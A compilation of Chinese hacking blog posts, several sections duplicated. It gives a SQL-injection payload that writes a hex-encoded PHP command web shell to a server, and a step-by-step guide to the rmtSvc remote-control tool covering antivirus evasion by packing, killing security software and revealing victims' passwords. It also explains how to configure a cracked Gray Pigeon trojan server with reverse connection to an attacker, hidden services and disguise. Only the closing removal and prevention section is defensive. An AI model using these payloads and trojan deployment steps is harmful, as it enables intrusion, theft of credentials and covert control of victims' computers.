SELECT * FROM `vbb_strikes` WHERE 1 union select 2,3,0x3C3F7068702073797374656D28245F524551554553545B636D645D293B3F3E from vbb_strikes into outfile 'c:/inetpub/wwwroot/cmd.php'

通过Mysql 的注入或者在 phpmyadmin 里运行以上语句,则会C:/inetpub/wwwroot/下生成 cmd.php 文件,内容为原来的 vbb_strikes 内容,后面紧跟着:

2 3

再通过 http://www.xxx.com/cmd.php?cmd=dir c:\ 就可以执行系统DOS命令!

哪串0x3C3F7068702073797374656D28245F524551554553545B636D645D293B3F3E是什么东西?

就是的十六进制编码了,如果不用这种方法,有不同的SQL版本会出现其它的编码:如%xx之类的,哪这个后门就不能执行的了!如果你有其它语名要弄,可以到UltraEdit里输入,再按[Ctrl+H]键,将里面的十六进制连在一起就可以了!
Tags: ,
听说过灰鸽子、冰河等可以实现远程控制,但你听说过IE也可以实现吗?不错,一款基于IE的新鲜工具——rmtSvc&vIDC即可让微软的IE成为一个超级黑客帮凶。本文除了将为你展现rmtSvc&vIDC是如何基于IE远程控制肉鸡以外,更在如何“暗杀”杀毒软件、攻击思路上有较强的指导性。

  如果我问你IE能做什么?你的答案绝对不完整!IE可不仅仅能浏览网页。如果我再告诉你IE还能用来远程控制、远程传输、进程管理、代理服务,甚至远程开启Telnet、FTP服务等等呢?你一定觉得不可思议吧,有了rmtSvc&vIDC,这一切皆有可能!

一、有IE 想黑就黑

  简单点说,rmtSvc是一款集FTP、Telnet服务、Proxy服务以及vIDC服务的远程控制工具。用户可以通过此款工具方便地对远程计算机进行控制。此工具和其它远程控制工具不同,它采用B/S结构(无需安装),用户可通过浏览器进行远程控制(我们的口号是:有IE,想黑就黑!)。

  下面,笔者就以入侵控制的实例来为大家分别介绍rmtSvc常用功能的使用方法及技巧。解压下载后的压缩包,先别急着让rmtSvc.exe在目标机运行(未加壳的程序会遭到

杀毒软件的查杀),笔者先告诉大家如何给源程序加壳从而避免被查杀吧(不然就没得玩了-_-|)。运行该软件,进入“选项”菜单,勾选“保留额外数据”,然后“打开文件”,选择源程序rmtSvc.exe后就会自动压缩了。

  特别提醒:压缩后的rmtSvc.exe不会被杀毒软件查杀,而且文件体积会减少近50%(经过金山毒霸6增强版、KV2005、诺顿2005测试),如果想进一步增强隐蔽性,请参考2004年第50期G9版《披着羊皮的狼——将Radmin改造为百分百木马》一文介绍的“超级捆绑”软件的使用方法。木马程序的欺骗发送本文就不作进一步讨论了。

  二、武装rmtSvc “暗杀”杀毒软件

  1.打开浏览器输入http://IPort(其中IP为被控机的IP地址,port为rmtSvc的服务端口,默认为7778)。连接成功后将会看到如图1的欢迎登录画面,输入访问密码(默认为123456),就可以进行rmtSvc所支持的操作(如果之前已经连同msnlib.dll和webe目录都发给了对方,那么rmtSvc将会多出用MSN进行远程控制和HTTP方式文件管理的功能)。

  2.欢迎登录画面的上方为rmtSvc的系统菜单,从左至右的功能依次为:Pview (进程查看)、Spy++(远程控制管理)、Proxy(启动或停止rmtSvc的代理服务)、vIDC(设置vIDCs的访问权限)、logoff(注销对rmtSvc登录)、Option(配置rmtSvc的运行参数)、About(rmtsvc欢迎/登录画面)。

  3.第一次登录需进入rmtSvc的参数设置更改敏感信息(图2),这样才能保障其安全性。先在“Modify Password”修改rmtSvc访问密码,再在“Service Port”更改rmtSvc服务端口为任意一个4位不常用的端口(需要重启服务才会生效,建议设为高端端口)。然后将“Start Control、Stolen mode”选上,这样rmtSvc会自动安装为Windows服务随机启动且服务为隐藏属性,这也就意味着在下次启动时,你可以继续控制目标机器。

  4.接下来在“Start mode”选项中,设置rmtSvc运行后自动启动FTP和Telnet服务(另外还有Proxy、vIDCs映射等)。通过FTP可以方便地进行文件上传下载。再将“Auto install service”和“Forbid detaching Dll”选择上,这样每次程序运行时会自动检测rmtSvc服务是否已安装,如果没有安装则自动安装为服务(相当于自我修复功能)并释放一个DLL文件(可修改文件名,默认为inject.dll),这是为了防止自动释放的未加壳的DLL被杀毒软件查杀,用户可以选择不释放DLL。手工将加壳后的DLL拷入到被控机的系统目录下,在释放DLL的名称处填入你加壳后的DLL名称。

  高手传经:rmtSvc释放的DLL主要有以下用处:隐藏进程、模拟“Ctrl+Alt+Del”按键、显示密码框密码、监视rmtSvc运行情况。如果异常退出或被杀掉则会自动重新启动,将配置参数写入rmtSvc程序本身(强烈建议选择)。

  5.接下来在“Killed Program”中,设定rmtSvc监视并自动杀掉的进程名称,如有多个进程,各个名称之间以逗号分隔。例如输入:PFW.exe,KAVSvc.exe就可以把金山毒霸和天网防火墙关闭。

  6.一切设置无误后,点击“Save”保存当前配置,在弹出的对话框中输入reg,将配置参数写入到

注册表。输入self则是将配置参数写入该EXE文件自身,如果填写其它则会生成相应文件名的.exe的副本,并将配置参数写入此EXE副本。例如:输入c:\abc.exe,将在c盘根目录下生成一个abc.exe副本,并将配置参数写入此副本。

  7.随后rmtSvc服务会重新启动运行。

  高手传经:隐藏模式下才可以将配置参数写入EXE本身,如果没有保存,每次在rmtSvc正常退出时也会将配置参数写入EXE本身。

  8.再次使用新设密码登录后,单击Pview进入“进程查看”页面,在这里将显示三个部分的信息:系统信息、进程/模块信息、CPU/内存使用信息。在页面的右边为进程模块显示区域,点击某个进程名则显示此进程的相关模块信息,点击“Kill It”按钮就可以杀掉该进程(需要注意的是进程列表不会实时自动刷新,用户必须手工刷新)。现在你的rmtSvc已经被武装到了牙齿,还等什么,可以出手了。

  三、用IE控制过把瘾

  把挡路的安全软件给“暗杀”后,接下来就可以趁对方不在时使用Spy++远程控制管理来远程控制机器了。当然在控制前我们需要将相关参数设置妥当,这样才能得到更好的控制效果。

  1.在“Quality”显示效果中选择Good(好),“Stretch”设置捕获图像的缩小比率80%。最后将“Cursor”选上,这样在捕获远程计算机屏幕时就会连同鼠标光标一起捕捉,以便用户知道当前鼠标光标位置。设置好后点击“Set”使上述三个参数生效。

  2.接下来就可以尝试控制了。当远程桌面图像处于焦点状态(鼠标在图像区域内),你就可以直接敲击键盘发送按键信息,和你操作本地机器一样。但是对于输入大段的文本这是非常不方便的,因为你的每次按键动作都会作为一次HTTP请求发出,输入速度很慢。

  如果你想输入大段文本,可以将鼠标选中Input输入框,然后输入你想要发送的文本,按下回车即可;如果选中了Crlf复选框,则在你输入的文本后面会自动加入回车换行。

  3.但是在进行远程计算机登录时,有些机器可能无法通过Input输入框直接输入登录密码,只能通过模拟键盘输入登录密码。方法如下:通过鼠标直接点击桌面图像,系统会自动识别你的鼠标的单击、双击键信息。如果你在按下鼠标的同时按下了“Shift”、“Alt”或“Ctrl”键,系统也能自动识别。

  4.为了更方便地控制远程桌面,可以将远程桌面图像设为自动刷新,这样就不会出现有动作发出而图像没有变化需要手工刷新的情况了。方法如下,勾选“Auto-refresh”项,在右边输入自动刷新间隔,默认为500ms。

  高手传经:如果想知道远程被控机中密码框中的密码。则需要用到Password→Text项,在有密码框时此项会变为Text→Password。此时只要用鼠标左键点击远程桌面图像的密码输入框,则远程被控机密码框中的密码会被翻译成明文显示。如果你取消此项功能,点击Text→Password项即可,此时此项就会变为Password→Text。

  5.如果要远程执行程序,选择Start下拉列表框的Run项,输入你要远程执行的文件名和参数即可,使用方法和Windows的开始菜单的运行命令一致。

  如此这般,通过IE就能像操作本机一样控制目标机了。

  四、FTP/Telnet 一个都不能少

  远程控制似乎并不能让我们感到满足,那就再来开启对方的FTP/Telnet服务,彻底过把入侵瘾吧。

  1.进入“FTP&Telnet”菜单,点击FTP/Telnet服务旁边的“Run”就可以启动相关服务了。FTP/Telnet port:设置FTP/Telnet服务的端口,默认FTP为2121,Telnet为2323。Anonymous access:设置访问FTP服务的权限,是否允许匿名访问(enable),如果不允许则设置访问的用户名和密码。

  2.另外,我们还要允许设置不同访问的账号,每个账号可以指定是否可写/可删除/可执行以及设置不同的FTP根目录。可以在FTP设置的文本输入框中输入多个访问账号信息,各个账号信息用回车换行分隔,账号信息格式如下:

  [账号名] SP [密码] SP [访问权限] SP [允许访问的目录] CRLF

  高手传经:设置PERMISSION(访问权限)时,0:仅仅只读,1:可写,3:可写并且可删除 7:可写可删除可执行。例如:[cytkk] sp [123456] sp [7] sp [c:] 就建立了一个拥有管理员权限,密码为123456的cytkk账户。

  3.此时FTP账号信息仅仅写入注册表保存,不会保存到EXE中。

  现在就可以利用FTP工具和Windows自带的Telnet工具进行登录和操作了,此时你想怎么玩就怎么玩吧!

  到此,rmtSvc基本功能的使用大家就已经学会了,限于篇幅,它更多的功能就不在此一一举例了,有兴趣的朋友可以通过论坛与我们共同探讨。
听说过灰鸽子、冰河等可以实现远程控制,但你听说过IE也可以实现吗?不错,一款基于IE的新鲜工具——rmtSvc&vIDC即可让微软的IE成为一个超级黑客帮凶。本文除了将为你展现rmtSvc&vIDC是如何基于IE远程控制肉鸡以外,更在如何“暗杀”杀毒软件、攻击思路上有较强的指导性。

  如果我问你IE能做什么?你的答案绝对不完整!IE可不仅仅能浏览网页。如果我再告诉你IE还能用来远程控制、远程传输、进程管理、代理服务,甚至远程开启Telnet、FTP服务等等呢?你一定觉得不可思议吧,有了rmtSvc&vIDC,这一切皆有可能!

一、有IE 想黑就黑

  简单点说,rmtSvc是一款集FTP、Telnet服务、Proxy服务以及vIDC服务的远程控制工具。用户可以通过此款工具方便地对远程计算机进行控制。此工具和其它远程控制工具不同,它采用B/S结构(无需安装),用户可通过浏览器进行远程控制(我们的口号是:有IE,想黑就黑!)。

  下面,笔者就以入侵控制的实例来为大家分别介绍rmtSvc常用功能的使用方法及技巧。解压下载后的压缩包,先别急着让rmtSvc.exe在目标机运行(未加壳的程序会遭到

杀毒软件的查杀),笔者先告诉大家如何给源程序加壳从而避免被查杀吧(不然就没得玩了-_-|)。运行该软件,进入“选项”菜单,勾选“保留额外数据”,然后“打开文件”,选择源程序rmtSvc.exe后就会自动压缩了。

  特别提醒:压缩后的rmtSvc.exe不会被杀毒软件查杀,而且文件体积会减少近50%(经过金山毒霸6增强版、KV2005、诺顿2005测试),如果想进一步增强隐蔽性,请参考2004年第50期G9版《披着羊皮的狼——将Radmin改造为百分百木马》一文介绍的“超级捆绑”软件的使用方法。木马程序的欺骗发送本文就不作进一步讨论了。

  二、武装rmtSvc “暗杀”杀毒软件

  1.打开浏览器输入http://IPort(其中IP为被控机的IP地址,port为rmtSvc的服务端口,默认为7778)。连接成功后将会看到如图1的欢迎登录画面,输入访问密码(默认为123456),就可以进行rmtSvc所支持的操作(如果之前已经连同msnlib.dll和webe目录都发给了对方,那么rmtSvc将会多出用MSN进行远程控制和HTTP方式文件管理的功能)。

  2.欢迎登录画面的上方为rmtSvc的系统菜单,从左至右的功能依次为:Pview (进程查看)、Spy++(远程控制管理)、Proxy(启动或停止rmtSvc的代理服务)、vIDC(设置vIDCs的访问权限)、logoff(注销对rmtSvc登录)、Option(配置rmtSvc的运行参数)、About(rmtsvc欢迎/登录画面)。

  3.第一次登录需进入rmtSvc的参数设置更改敏感信息(图2),这样才能保障其安全性。先在“Modify Password”修改rmtSvc访问密码,再在“Service Port”更改rmtSvc服务端口为任意一个4位不常用的端口(需要重启服务才会生效,建议设为高端端口)。然后将“Start Control、Stolen mode”选上,这样rmtSvc会自动安装为Windows服务随机启动且服务为隐藏属性,这也就意味着在下次启动时,你可以继续控制目标机器。

  4.接下来在“Start mode”选项中,设置rmtSvc运行后自动启动FTP和Telnet服务(另外还有Proxy、vIDCs映射等)。通过FTP可以方便地进行文件上传下载。再将“Auto install service”和“Forbid detaching Dll”选择上,这样每次程序运行时会自动检测rmtSvc服务是否已安装,如果没有安装则自动安装为服务(相当于自我修复功能)并释放一个DLL文件(可修改文件名,默认为inject.dll),这是为了防止自动释放的未加壳的DLL被杀毒软件查杀,用户可以选择不释放DLL。手工将加壳后的DLL拷入到被控机的系统目录下,在释放DLL的名称处填入你加壳后的DLL名称。

  高手传经:rmtSvc释放的DLL主要有以下用处:隐藏进程、模拟“Ctrl+Alt+Del”按键、显示密码框密码、监视rmtSvc运行情况。如果异常退出或被杀掉则会自动重新启动,将配置参数写入rmtSvc程序本身(强烈建议选择)。

  5.接下来在“Killed Program”中,设定rmtSvc监视并自动杀掉的进程名称,如有多个进程,各个名称之间以逗号分隔。例如输入:PFW.exe,KAVSvc.exe就可以把金山毒霸和天网防火墙关闭。

  6.一切设置无误后,点击“Save”保存当前配置,在弹出的对话框中输入reg,将配置参数写入到

注册表。输入self则是将配置参数写入该EXE文件自身,如果填写其它则会生成相应文件名的.exe的副本,并将配置参数写入此EXE副本。例如:输入c:\abc.exe,将在c盘根目录下生成一个abc.exe副本,并将配置参数写入此副本。

  7.随后rmtSvc服务会重新启动运行。

  高手传经:隐藏模式下才可以将配置参数写入EXE本身,如果没有保存,每次在rmtSvc正常退出时也会将配置参数写入EXE本身。

  8.再次使用新设密码登录后,单击Pview进入“进程查看”页面,在这里将显示三个部分的信息:系统信息、进程/模块信息、CPU/内存使用信息。在页面的右边为进程模块显示区域,点击某个进程名则显示此进程的相关模块信息,点击“Kill It”按钮就可以杀掉该进程(需要注意的是进程列表不会实时自动刷新,用户必须手工刷新)。现在你的rmtSvc已经被武装到了牙齿,还等什么,可以出手了。

  三、用IE控制过把瘾

  把挡路的安全软件给“暗杀”后,接下来就可以趁对方不在时使用Spy++远程控制管理来远程控制机器了。当然在控制前我们需要将相关参数设置妥当,这样才能得到更好的控制效果。

  1.在“Quality”显示效果中选择Good(好),“Stretch”设置捕获图像的缩小比率80%。最后将“Cursor”选上,这样在捕获远程计算机屏幕时就会连同鼠标光标一起捕捉,以便用户知道当前鼠标光标位置。设置好后点击“Set”使上述三个参数生效。

  2.接下来就可以尝试控制了。当远程桌面图像处于焦点状态(鼠标在图像区域内),你就可以直接敲击键盘发送按键信息,和你操作本地机器一样。但是对于输入大段的文本这是非常不方便的,因为你的每次按键动作都会作为一次HTTP请求发出,输入速度很慢。

  如果你想输入大段文本,可以将鼠标选中Input输入框,然后输入你想要发送的文本,按下回车即可;如果选中了Crlf复选框,则在你输入的文本后面会自动加入回车换行。

  3.但是在进行远程计算机登录时,有些机器可能无法通过Input输入框直接输入登录密码,只能通过模拟键盘输入登录密码。方法如下:通过鼠标直接点击桌面图像,系统会自动识别你的鼠标的单击、双击键信息。如果你在按下鼠标的同时按下了“Shift”、“Alt”或“Ctrl”键,系统也能自动识别。

  4.为了更方便地控制远程桌面,可以将远程桌面图像设为自动刷新,这样就不会出现有动作发出而图像没有变化需要手工刷新的情况了。方法如下,勾选“Auto-refresh”项,在右边输入自动刷新间隔,默认为500ms。

  高手传经:如果想知道远程被控机中密码框中的密码。则需要用到Password→Text项,在有密码框时此项会变为Text→Password。此时只要用鼠标左键点击远程桌面图像的密码输入框,则远程被控机密码框中的密码会被翻译成明文显示。如果你取消此项功能,点击Text→Password项即可,此时此项就会变为Password→Text。

  5.如果要远程执行程序,选择Start下拉列表框的Run项,输入你要远程执行的文件名和参数即可,使用方法和Windows的开始菜单的运行命令一致。

  如此这般,通过IE就能像操作本机一样控制目标机了。

  四、FTP/Telnet 一个都不能少

  远程控制似乎并不能让我们感到满足,那就再来开启对方的FTP/Telnet服务,彻底过把入侵瘾吧。

  1.进入“FTP&Telnet”菜单,点击FTP/Telnet服务旁边的“Run”就可以启动相关服务了。FTP/Telnet port:设置FTP/Telnet服务的端口,默认FTP为2121,Telnet为2323。Anonymous access:设置访问FTP服务的权限,是否允许匿名访问(enable),如果不允许则设置访问的用户名和密码。

  2.另外,我们还要允许设置不同访问的账号,每个账号可以指定是否可写/可删除/可执行以及设置不同的FTP根目录。可以在FTP设置的文本输入框中输入多个访问账号信息,各个账号信息用回车换行分隔,账号信息格式如下:

  [账号名] SP [密码] SP [访问权限] SP [允许访问的目录] CRLF

  高手传经:设置PERMISSION(访问权限)时,0:仅仅只读,1:可写,3:可写并且可删除 7:可写可删除可执行。例如:[cytkk] sp [123456] sp [7] sp [c:] 就建立了一个拥有管理员权限,密码为123456的cytkk账户。

  3.此时FTP账号信息仅仅写入注册表保存,不会保存到EXE中。

  现在就可以利用FTP工具和Windows自带的Telnet工具进行登录和操作了,此时你想怎么玩就怎么玩吧!

  到此,rmtSvc基本功能的使用大家就已经学会了,限于篇幅,它更多的功能就不在此一一举例了,有兴趣的朋友可以通过论坛与我们共同探讨。
今天我们就用"灰鸽子"来向大家详细解析这款木马的服务端配置方式,只可实验,不可做坏事,大家不喜欢请跳过这一章。
下载最新版的:灰鸽子Vip2007 beta2
第一节:未雨绸缪,实验准备。

第一,关闭杀毒软件,这点不用我说了吧~~~因为是木马,下载了之后如果杀毒软件监控开着的话肯定会被删除的。
第二,当然是下载灰鸽子的软件啦~~~上网找,有很多~~~
第三,申请一个免费的主页空间,为什么要呢?因为灰鸽子是可以反弹式链接的,也就是说,服务端通过登陆你的主页的特定文件就可以主动连接到你的电脑让你控制了。(这一点,等一下会详细解说)

第二节:实战开始。

把我们刚才下来的文件解压到某个文件夹,记住,不要改文件夹的名字,后面会用到。

解压的文件里面有以下几个文件:

H_Client.exe 这个是客户端的主要文件,可以配置文件,生成服务端,可以远程控制客户端。http.exe 这个是本地http服务器,因为我们的灰鸽子是破解版的,通常正式版的灰鸽子会到官方的服务器上去验证你的软件是否正版,所以这个软件就是用来在本机子上建一个服务器,骗过软件的,从而达到破解的目的。sunray.exe 这个里面其实也就只是一个host,它把http://www.huigezi.com这个网站的域名本地解析到本机,而不是解析到官方网站。
vip_2005_0113.rar 这个是验证的软件,当我们的软件解析到本机的时候它就会下载这一个到客户端,用来验证用的。其它的文件还有config2005.asp,Operate.ini 还有四个文件夹,他们分别是(dat images login sound)我也不知道什么用的。应该是配置用的。


第一步:在你的电脑上新建一个ip.txt的文本文件,内容如下:

http://huigezi212.126.131.43:8000end其中212.126.131.43这个是我的电脑IP地址,8000是连接的端口,你可以把它写成你自己的IP地址,端口一般不要去改动,然后把这个文件上传到你刚才申请的空间,如果你的电脑是动态IP的话,那你就要经常更新这个文件的内容,然后上传到空间,它的目的是客户端上线的话就会去这个网站读取这个文件,然后主动和你取得连接。
第二步,首先运行 sunray.exe,然后运行 http.exe 点开始服务!
第三步,运行客户端,也就是H_Client.exe这个文件,我们可以看到以下界面,如图1


点击配置服务程序,用来生成服务端,如图2


点击“自动上线”选项,有几个要点要说的,

1)“备用自动上线,URL转向域名或网页文件,这里呢,填写你刚才申请到的网站空间地址和ip.txt,比如http://你的网站地址/ip.txt(当然,如果你是固定IP的话呢,可以写你的IP地址,那么前面的申请空间,上传文件几步可以省略)
2) “自动连接密码”,这个是表示你可以连接到的电脑所要用到的密码,如果为空的话,也没什么大不了的,顶多就是别人也可以用你的“肉鸡”
3)“配置说明”建议你把“只使用备用自动上线”前的勾打上,因为我们的软件是破解版的,官方的那个服务器我们是用不了啦~~~
4)“用户名称”“用户密码”这两个地方乱填些数字进去就行了,破解版用不了正式版的服务器的,它是服务器用来验证软件是否“正版”用的。


“安装选项”选项卡,建议修改一下名字,以免被发现,其它的自己看着办,看着喜欢就选吧~~~^_^
“启动项”这个很重要,建议你修改一下名字,它主要是服务端随系统自动启动用的,也是自己看着办。其中的“生成服务”这一项是为了达到隐藏用的,这也是我们经常说的手工清除木马的关键。也是长期以来很多人说无法清除灰鸽子的原因,因为它写成了服务,这个的优先级是系统级的,所有使用这台电脑的用户都会启动木马。
“代理服务”,嘻嘻,就是你控制的电脑可以给我们做为一台代理服务器,说不定人家公布出来的代理服~务器地址有一部分是这些电脑的哦~~~
“高级选项”这里主要是用来对付杀毒软件和防火墙用的,默认是插入IEXPLORER,启动隐藏文件隐藏插入的IE进程,以及使用UPX压缩,这里就不用去改它的,默认就行。
"服务器图标”是用来伪装用的,你自己选项自己喜欢的图标吧~~~

配置好了就点击生成服务器,软件会优先从官方验证,但没效,出错了后就从本地服务器验证,这就是我们要本机建http服务器的原因。好了,到此,服务端就生成了,不要运行它,运行了你就会中木马的,(不准做坏事)

软件使用方法:当别人中了你的木马后,它会从你的网站读取ip.txt这个文件,然后主动连接到你的电脑,如果你此时也打开了客户端的话,连接建立成功,你可以控制这台电脑了。具体有什么内容你自己摸索,如果你是动态IP地址的话,那么你要每次把新的ip.txt上传到网站上去~~~


灰鸽子是国内一款著名后门。比起前辈冰河、黑洞来,灰鸽子可以说是国内后门的集大成者。其丰富而强大的功能、灵活多变的操作、良好的隐藏性使其他后门都相形见绌。客户端简易便捷的操作使刚入门的初学者都能充当黑客。当使用在合法情况下时,灰鸽子是一款优秀的远程控制软件。但如果拿它做一些非法的事,灰鸽子就成了很强大的黑客工具。这就好比火药,用在不同的场合,给人类带来不同的影响。对灰鸽子完整的介绍也许只有灰鸽子作者本人能够说清楚,在此我们只能进行简要介绍。

灰鸽子客户端和服务端都是采用Delphi编写。黑客利用客户端程序配置出服务端程序。可配置的信息主要包括上线类型(如等待连接还是主动连接)、主动连接时使用的公网IP(域名)、连接密码、使用的端口、启动项名称、服务名称,进程隐藏方式,使用的壳,代理,图标等等。 服务端对客户端连接方式有多种,使得处于各种网络环境的用户都可能中毒,包括局域网用户(通过代理上网)、公网用户和ADSL拨号用户等。

下面介绍服务端:

配置出来的服务端文件文件名为G_Server.exe(这是默认的,当然也可以改洌 H缓蠛诳屠 靡磺邪旆ㄓ掌 没г诵蠫_Server.exe程序。具体采用什么办法,读者可以充分发挥想象力,这里就不赘述。G_Server.exe运行后将自己拷贝到Windows目录下(98/xp下为系统盘的windows目录,2k/NT下为系统盘的Winnt目录),然后再从体内释放G_Server.dll和G_Server_Hook.dll到windows目录下。G_Server.exe、G_Server.dll和G_Server_Hook.dll三个文件相互配合组成了灰鸽子服务端,G_Server_Hook.dll负责隐藏灰鸽子。通过截获进程的API调用隐藏灰鸽子的文件、服务的注册表项,甚至是进程中的模块名。截获的函数主要是用来遍历文件、遍历注册表项和遍历进程模块的一些函数。所以,有些时候用户感觉种了毒,但仔细检查却又发现不了什么异常。有些灰鸽子会多释放出一个名为G_ServerKey.dll的文件用来记录键盘操作。注意,G_Server.exe这个名称并不固定,它是可以定制的,比如当定制服务端文件名为A.exe时,生成的文件就是A.exe、A.dll和A_Hook.dll。

Windows目录下的G_Server.exe文件将自己注册成服务(9X系统写注册表启动项),每次开机都能自动运行,运行后启动G_Server.dll和G_Server_Hook.dll并自动退出。G_Server.dll文件实现后门功能,与控制端客户端进行通信;G_Server_Hook.dll则通过拦截API调用来隐藏病毒。因此,中毒后,我们看不到病毒文件,也看不到病毒注册的服务项。随着灰鸽子服务端文件的设置不同,G_Server_Hook.dll有时候附在Explorer.exe的进程空间中,有时候则是附在所有进程中。

灰鸽子的作者对于如何逃过杀毒软件的查杀花了很大力气。由于一些API函数被截获,正常模式下难以遍历到灰鸽子的文件和模块,造成查杀上的困难。要卸载灰鸽子动态库而且保证系统进程不崩溃也很麻烦,因此造成了近期灰鸽子在互联网上泛滥的局面。


一.灰鸽子的手工检测
由于灰鸽子拦截了API调用,在正常模式下服务端程序文件和它注册的服务项均被隐藏,也就是说你即使设置了“显示所有隐藏文件”也看不到它们。此外,灰鸽子服务端的文件名也是可以自定义的,这都给手工检测带来了一定的困难。

但是,通过仔细观察我们发现,对于灰鸽子的检测仍然是有规律可循的。从上面的运行原理分析可以看出,无论自定义的服务器端文件名是什么,一般都会在操作系统的安装目录下生成一个以“_hook.dll”结尾的文件。通过这一点,我们可以较为准确手工检测出灰鸽子 服务端。

由于正常模式下灰鸽子会隐藏自身,因此检测灰鸽子的操作一定要在安全模式下进行。进入安全模式的方法是:启动计算机,在系统进入Windows启动画面前,按下F8键(或者在启动计算机时按住Ctrl键不放),在出现的启动选项菜单中,选择“Safe Mode”或“安全模式”。

1、由于灰鸽子的文件本身具有隐藏属性,因此要设置Windows显示所有文件。打开“我的电脑”,选择菜单“工具”—》“文件夹选项”,点击“查看”,取消“隐藏受保护的操作系统文件”前的对勾,并在“隐藏文件和文件夹”项中
选择“显示所有文件和文件夹”,然后点击“确定”。
2、打开Windows的“搜索文件”,文件名称输入“_hook.dll”,搜索位置选择Windows的安装目录(默认98/xp为C:\windows,2k/NT为C:\Winnt)。
3、经过搜索,我们在Windows目录(不包含子目录)下发现了一个名为Game_Hook.dll的文件。
4、根据灰鸽子原理分析我们知道,如果Game_Hook.DLL是灰鸽子的文件,则在操作系统安装目录下还会有Game.exe和Game.dll文件。打开Windows目录,果然有这两个文件,同时还有一个用于记录键盘操作的GameKey.dll文件。

经过这几步操作我们基本就可以确定这些文件是灰鸽子 服务端了,下面就可以进行手动清除。

二、灰鸽子的手工清除

经过上面的分析,清除灰鸽子就很容易了。清除灰鸽子仍然要在安全模式下操作,主要有两步:1、清除灰鸽子的服务;2删除灰鸽子程序文件。

注意:为防止误操作,清除前一定要做好备份。

(一)、清除灰鸽子的服务

注意清除灰鸽子的服务一定要在注册表里完成,对注册表不熟悉的网友请找熟悉的人帮忙操作,清除灰鸽子的服务一定要先备份注册表,或者到纯DOS下将注册表文件更名,然后在去注册表删除灰鸽子的服务。因为病毒会和EXE文件进行关联

2000/XP系统:
1、打开注册表编辑器(点击“开始”-》“运行”,输入“Regedit.exe”,确定。),打开 HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services注册表项。
2、点击菜单“编辑”-》“查找”,“查找目标”输入“game.exe”,点击确定,我们就可以找到灰鸽子的服务项(此例为Game_Server,每个人这个服务项名称是不同的)。
3、删除整个Game_Server项。 98/me系统: 在9X下,灰鸽子启动项只有一个,因此清除更为简单。运行注册表编辑器,打开HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run项,我们立即看到名为Game.exe的一项,将Game.exe项删除即可。

(二)、删除灰鸽子程序文件

删除灰鸽子程序文件非常简单,只需要在安全模式下删除Windows目录下的Game.exe、Game.dll、Game_Hook.dll以及Gamekey.dll文件,然后重新启动计算机。至此,灰鸽子VIP 2005 服务端已经被清除干净。

以上介绍的方法适用于我们看到的大部分灰鸽子木马及其变种,然而仍有极少数变种采用此种方法无法检测和清除。同时,随着灰鸽子新版本的不断推出,作者可能会加入一些新的隐藏方法、防删除手段,手工检测和清除它的难度也会越来越大。

三、防止中灰鸽子病毒需要注意的事项

1. 给系统安装补丁程序。通过Windows Update安装好系统补丁程序(关键更新、安全更新和Service pack),其中MS04-011、MS04-012、MS04-013、MS03-001、MS03-007、MS03-049、MS04-032等都被病毒广泛利用,是非常必要的补丁程序
2. 给系统管理员帐户设置足够复杂足够强壮的密码,最好能是10位以上,字母+数字+其它符号的组合;也可以禁用/删除一些不使用的帐户
3. 经常更新杀毒软件(病毒库),设置允许的可设置为每天定时自动更新。安装并合理使用网络防火墙软件,网络防火墙在防病毒过程中也可以起到至关重要的作用,能有效地阻挡自来网络的攻击和病毒的入侵。部分盗版Windows用户不能正常安装补丁,这点也比较无奈,这部分用户不妨通过使用网络防火墙来进行一定防护
4. 关闭一些不需要的服务,条件允许的可关闭没有必要的共享,也包括C$、D$等管理共享。完全单机的用户可直接关闭Server服务。这些都可以用winxp总管等优化软件关闭。
WinXP 总管 v4.9.3 中文注册版
http://www.366tian.net/soft/data/soft/219.html
5. 不要随便打开或运行陌生、可疑文件和程序,如邮件中的奇怪附件,WG程序等。


软件名称: 灰鸽子(Huigezi、Gpigeon)专用检测清除工具
官方提供的清除工具
下载地址:
http://www.huigezi.net/opensoft.asp?soft_id=112&url=1
Tags:
今天我们就用"灰鸽子"来向大家详细解析这款木马的服务端配置方式,只可实验,不可做坏事,大家不喜欢请跳过这一章。
下载最新版的:灰鸽子Vip2007 beta2
第一节:未雨绸缪,实验准备。

第一,关闭杀毒软件,这点不用我说了吧~~~因为是木马,下载了之后如果杀毒软件监控开着的话肯定会被删除的。
第二,当然是下载灰鸽子的软件啦~~~上网找,有很多~~~
第三,申请一个免费的主页空间,为什么要呢?因为灰鸽子是可以反弹式链接的,也就是说,服务端通过登陆你的主页的特定文件就可以主动连接到你的电脑让你控制了。(这一点,等一下会详细解说)

第二节:实战开始。

把我们刚才下来的文件解压到某个文件夹,记住,不要改文件夹的名字,后面会用到。

解压的文件里面有以下几个文件:

H_Client.exe 这个是客户端的主要文件,可以配置文件,生成服务端,可以远程控制客户端。http.exe 这个是本地http服务器,因为我们的灰鸽子是破解版的,通常正式版的灰鸽子会到官方的服务器上去验证你的软件是否正版,所以这个软件就是用来在本机子上建一个服务器,骗过软件的,从而达到破解的目的。sunray.exe 这个里面其实也就只是一个host,它把http://www.huigezi.com这个网站的域名本地解析到本机,而不是解析到官方网站。
vip_2005_0113.rar 这个是验证的软件,当我们的软件解析到本机的时候它就会下载这一个到客户端,用来验证用的。其它的文件还有config2005.asp,Operate.ini 还有四个文件夹,他们分别是(dat images login sound)我也不知道什么用的。应该是配置用的。


第一步:在你的电脑上新建一个ip.txt的文本文件,内容如下:

http://huigezi212.126.131.43:8000end其中212.126.131.43这个是我的电脑IP地址,8000是连接的端口,你可以把它写成你自己的IP地址,端口一般不要去改动,然后把这个文件上传到你刚才申请的空间,如果你的电脑是动态IP的话,那你就要经常更新这个文件的内容,然后上传到空间,它的目的是客户端上线的话就会去这个网站读取这个文件,然后主动和你取得连接。
第二步,首先运行 sunray.exe,然后运行 http.exe 点开始服务!
第三步,运行客户端,也就是H_Client.exe这个文件,我们可以看到以下界面,如图1


点击配置服务程序,用来生成服务端,如图2


点击“自动上线”选项,有几个要点要说的,

1)“备用自动上线,URL转向域名或网页文件,这里呢,填写你刚才申请到的网站空间地址和ip.txt,比如http://你的网站地址/ip.txt(当然,如果你是固定IP的话呢,可以写你的IP地址,那么前面的申请空间,上传文件几步可以省略)
2) “自动连接密码”,这个是表示你可以连接到的电脑所要用到的密码,如果为空的话,也没什么大不了的,顶多就是别人也可以用你的“肉鸡”
3)“配置说明”建议你把“只使用备用自动上线”前的勾打上,因为我们的软件是破解版的,官方的那个服务器我们是用不了啦~~~
